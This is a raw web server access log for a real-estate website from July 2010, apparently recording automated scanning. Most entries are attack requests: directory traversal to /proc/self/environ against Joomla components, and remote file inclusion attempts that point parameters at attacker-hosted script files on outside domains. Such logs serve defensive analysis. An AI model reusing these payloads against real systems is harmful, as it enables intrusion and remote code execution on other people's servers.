209.97.216.92 - - [29/Jul/2010:03:03:23 -0700] "GET /logs//index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
82.194.67.98 - - [29/Jul/2010:03:03:24 -0700] "GET /logs/access.log//index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
82.194.67.98 - - [29/Jul/2010:03:03:36 -0700] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
82.194.67.98 - - [29/Jul/2010:03:03:25 -0700] "GET /logs//index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
202.47.80.12 - - [29/Jul/2010:03:07:27 -0700] "GET /index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
202.47.80.12 - - [29/Jul/2010:03:07:38 -0700] "GET /index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
212.174.28.46 - - [29/Jul/2010:03:07:39 -0700] "GET /logs/scripts.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.hanhaho.com/bbs/data/mutiupload/chelly??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
82.194.67.98 - - [29/Jul/2010:03:07:57 -0700] "GET /logs/access_100624.log//index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
82.194.67.98 - - [29/Jul/2010:03:08:15 -0700] "GET /logs/access_100624.log//index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
212.174.28.46 - - [29/Jul/2010:03:11:11 -0700] "GET /logs/access.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.hanhaho.com/bbs/data/mutiupload/chelly??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
208.43.40.176 - - [29/Jul/2010:03:11:48 -0700] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1653 "-" "libwww-perl/5.831" "www.prosouthrealty.com"
208.43.40.176 - - [29/Jul/2010:03:11:49 -0700] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 916 "-" "libwww-perl/5.831" "www.prosouthrealty.com"
78.41.233.128 - - [29/Jul/2010:03:13:05 -0700] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1653 "-" "libwww-perl/5.805" "www.prosouthrealty.com"
78.41.233.128 - - [29/Jul/2010:03:13:17 -0700] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 916 "-" "libwww-perl/5.805" "www.prosouthrealty.com"
94.23.46.76 - - [29/Jul/2010:03:13:37 -0700] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1653 "-" "libwww-perl/5.803" "www.prosouthrealty.com"
94.23.46.76 - - [29/Jul/2010:03:13:26 -0700] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 916 "-" "libwww-perl/5.803" "www.prosouthrealty.com"
173.212.242.11 - - [29/Jul/2010:03:23:24 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.joodsmaastricht.nl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
173.212.242.11 - - [29/Jul/2010:03:23:25 -0700] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.joodsmaastricht.nl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
173.212.242.11 - - [29/Jul/2010:03:23:36 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.joodsmaastricht.nl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
95.108.150.235 - - [29/Jul/2010:03:24:20 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "prosouthrealty.com"
95.108.150.235 - - [29/Jul/2010:03:24:20 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.prosouthrealty.com"
95.108.150.235 - - [29/Jul/2010:03:24:32 -0700] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "prosouthrealty.com"
95.108.150.235 - - [29/Jul/2010:03:24:33 -0700] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.prosouthrealty.com"
95.108.150.235 - - [29/Jul/2010:03:24:22 -0700] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "prosouthrealty.com"
95.108.150.235 - - [29/Jul/2010:03:24:22 -0700] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.prosouthrealty.com"
202.47.80.12 - - [29/Jul/2010:03:25:28 -0700] "GET /logs/access.log//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
202.47.80.12 - - [29/Jul/2010:03:25:29 -0700] "GET /logs/access.log//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
202.47.80.12 - - [29/Jul/2010:03:25:23 -0700] "GET /index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
202.47.80.12 - - [29/Jul/2010:03:25:23 -0700] "GET /index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
202.47.80.12 - - [29/Jul/2010:03:25:29 -0700] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
202.47.80.12 - - [29/Jul/2010:03:25:29 -0700] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
91.121.141.186 - - [29/Jul/2010:03:28:02 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
67.210.119.155 - - [29/Jul/2010:03:28:10 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.prosouthrealty.com"
188.165.217.175 - - [29/Jul/2010:03:28:11 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
91.121.141.186 - - [29/Jul/2010:03:28:12 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
91.121.141.186 - - [29/Jul/2010:03:29:17 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
91.121.141.186 - - [29/Jul/2010:03:29:30 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
188.165.217.175 - - [29/Jul/2010:03:29:44 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
91.121.141.186 - - [29/Jul/2010:03:33:59 -0700] "GET /logs/access.log/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
91.121.141.186 - - [29/Jul/2010:03:33:59 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
91.121.141.186 - - [29/Jul/2010:03:33:48 -0700] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
91.121.141.186 - - [29/Jul/2010:03:33:49 -0700] "GET /logs/access.log/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
91.121.141.186 - - [29/Jul/2010:03:33:49 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
91.121.141.186 - - [29/Jul/2010:03:33:50 -0700] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
188.165.217.175 - - [29/Jul/2010:03:33:51 -0700] "GET /logs/access.log/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
188.165.217.175 - - [29/Jul/2010:03:34:02 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
188.165.217.175 - - [29/Jul/2010:03:33:51 -0700] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
91.121.141.186 - - [29/Jul/2010:03:34:16 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
188.165.217.175 - - [29/Jul/2010:03:34:18 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
67.210.119.155 - - [29/Jul/2010:03:34:34 -0700] "GET /logs/access.log/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.prosouthrealty.com"
67.210.119.155 - - [29/Jul/2010:03:34:45 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.prosouthrealty.com"
67.210.119.155 - - [29/Jul/2010:03:34:34 -0700] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.prosouthrealty.com"
91.121.141.186 - - [29/Jul/2010:03:36:11 -0700] "GET /logs/access.log/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
91.121.141.186 - - [29/Jul/2010:03:36:11 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
91.121.141.186 - - [29/Jul/2010:03:36:00 -0700] "GET /logs/access.log/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
91.121.141.186 - - [29/Jul/2010:03:36:01 -0700] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
91.121.141.186 - - [29/Jul/2010:03:36:01 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
91.121.141.186 - - [29/Jul/2010:03:36:01 -0700] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
188.165.217.175 - - [29/Jul/2010:03:37:01 -0700] "GET /logs/access.log/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
188.165.217.175 - - [29/Jul/2010:03:37:12 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
188.165.217.175 - - [29/Jul/2010:03:37:01 -0700] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
91.121.141.186 - - [29/Jul/2010:03:37:30 -0700] "GET /logs/access_100622.log/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
91.121.141.186 - - [29/Jul/2010:03:37:42 -0700] "GET /logs/access_100622.log/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
188.165.217.175 - - [29/Jul/2010:03:38:36 -0700] "GET /logs/access_100622.log/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
67.210.119.155 - - [29/Jul/2010:03:39:15 -0700] "GET /logs/access_100622.log/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.prosouthrealty.com"
188.165.217.175 - - [29/Jul/2010:03:50:26 -0700] "GET /logs/access.log/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
188.165.217.175 - - [29/Jul/2010:03:50:15 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
188.165.217.175 - - [29/Jul/2010:03:50:26 -0700] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
91.121.141.186 - - [29/Jul/2010:03:50:34 -0700] "GET /logs/access.log/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
91.121.141.186 - - [29/Jul/2010:03:50:45 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
91.121.141.186 - - [29/Jul/2010:03:50:34 -0700] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
67.195.114.243 - - [29/Jul/2010:03:53:28 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.prosouthrealty.com"
67.195.114.243 - - [29/Jul/2010:03:53:28 -0700] "GET /?N=A HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.prosouthrealty.com"
209.97.216.92 - - [29/Jul/2010:03:56:34 -0700] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
82.194.67.98 - - [29/Jul/2010:03:56:43 -0700] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
82.194.67.98 - - [29/Jul/2010:03:57:05 -0700] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
82.194.67.98 - - [29/Jul/2010:03:58:35 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
82.194.67.98 - - [29/Jul/2010:03:58:47 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
209.97.216.92 - - [29/Jul/2010:03:59:12 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
212.61.10.138 - - [29/Jul/2010:04:09:41 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://community.6mconline.net/e107_files/nav_menu/sh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
212.61.10.138 - - [29/Jul/2010:04:09:30 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://community.6mconline.net/e107_files/nav_menu/sh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
212.61.10.138 - - [29/Jul/2010:04:09:30 -0700] "GET /components/com_flyspray/startdown.php?file=http://community.6mconline.net/e107_files/nav_menu/sh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
80.249.173.117 - - [29/Jul/2010:04:12:44 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.africamissionsna.org//sc/as.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
80.249.173.117 - - [29/Jul/2010:04:12:56 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.africamissionsna.org//sc/as.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
80.249.173.117 - - [29/Jul/2010:04:12:45 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.africamissionsna.org//sc/as.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
80.249.173.117 - - [29/Jul/2010:04:12:58 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.africamissionsna.org//sc/as.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
80.249.173.117 - - [29/Jul/2010:04:12:58 -0700] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.africamissionsna.org//sc/as.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
82.194.67.98 - - [29/Jul/2010:04:14:43 -0700] "GET /logs/access.log//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
82.194.67.98 - - [29/Jul/2010:04:14:54 -0700] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
82.194.67.98 - - [29/Jul/2010:04:14:43 -0700] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
208.64.68.228 - - [29/Jul/2010:04:18:36 -0700] "GET /logs//public/index.php?option=co...&month=07&day=23&Itemid=1//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.historiavirtual.org/modules/mod_files/yuki/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
208.64.68.228 - - [29/Jul/2010:04:18:47 -0700] "GET /logs/access.log//public/index.php?option=co...&month=07&day=23&Itemid=1//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.historiavirtual.org/modules/mod_files/yuki/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
208.64.68.228 - - [29/Jul/2010:04:18:47 -0700] "GET /public/index.php?option=co...&month=07&day=23&Itemid=1//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.historiavirtual.org/modules/mod_files/yuki/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
80.249.173.117 - - [29/Jul/2010:04:20:41 -0700] "GET /logs/access_100626.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.africamissionsna.org//sc/as.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
80.249.173.117 - - [29/Jul/2010:04:21:02 -0700] "GET /logs/access_100626.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.africamissionsna.org//sc/as.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
211.238.14.22 - - [29/Jul/2010:04:24:15 -0700] "GET /logs/access.log//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
211.238.14.22 - - [29/Jul/2010:04:24:26 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
211.238.14.22 - - [29/Jul/2010:04:24:15 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
209.97.216.92 - - [29/Jul/2010:04:25:54 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
209.97.216.92 - - [29/Jul/2010:04:25:54 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
209.97.216.92 - - [29/Jul/2010:04:26:05 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
74.50.85.50 - - [29/Jul/2010:04:26:41 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
67.215.230.121 - - [29/Jul/2010:04:29:29 -0700] "GET /logs/access.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.joodsmaastricht.nl/idx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
67.215.230.121 - - [29/Jul/2010:04:29:29 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.joodsmaastricht.nl/idx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
67.215.230.121 - - [29/Jul/2010:04:29:40 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.joodsmaastricht.nl/idx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
173.212.242.11 - - [29/Jul/2010:04:29:59 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.joodsmaastricht.nl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
173.212.242.11 - - [29/Jul/2010:04:29:59 -0700] "GET /logs/access.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.joodsmaastricht.nl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
173.212.242.11 - - [29/Jul/2010:04:30:00 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.joodsmaastricht.nl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
93.183.205.182 - - [29/Jul/2010:04:30:08 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "www.prosouthrealty.com"
187.45.193.154 - - [29/Jul/2010:04:31:00 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
74.50.85.50 - - [29/Jul/2010:04:31:24 -0700] "GET /logs/access.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
74.50.85.50 - - [29/Jul/2010:04:31:12 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
74.50.85.50 - - [29/Jul/2010:04:31:24 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.prosouthrealty.com"
67.215.230.121 - - [29/Jul/2010:04:34:22 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.joodsmaastricht.nl/idx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
67.215.230.121 - - [29/Jul/2010:04:34:11 -0700] "GET /logs/access.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.joodsmaastricht.nl/idx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
67.215.230.121 - - [29/Jul/2010:04:34:12 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.joodsmaastricht.nl/idx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
67.215.230.121 - - [29/Jul/2010:04:34:16 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.joodsmaastricht.nl/idx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
